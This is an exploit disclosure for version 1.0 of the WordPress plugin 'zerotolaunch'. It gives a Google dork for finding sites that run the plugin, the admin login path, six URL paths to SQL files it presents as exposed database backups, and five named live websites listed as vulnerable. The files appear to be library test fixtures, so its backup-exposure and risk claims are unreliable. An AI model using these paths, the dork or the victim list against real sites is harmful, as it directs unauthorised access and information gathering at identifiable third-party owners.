#################################################################################################

# Exploit Title : WordPress zerotolaunch Plugins 1.0 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 03/02/2018
# Vendor Homepage : wordpress.org
+ themesinfo.com/wordpress-plugins/wordpress-zerotolaunch-plugin-djjx
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/zerotolaunch/''
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110216
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2265
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31544
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/mysql.sql

/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/oci-after-fixtures.sql

/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/oci.sql

/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql-after-fixtures.sql

/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql.sql

/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql

#################################################################################################

# Example Vulnerable Sites =>

[+]
ilovevitiligo.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql

[+]
vidauthority.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql

[+]
tershaandmatt.com/blog/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql

[+]
redeyedistrict.com/zenfen/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql

[+]
creativelifework.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################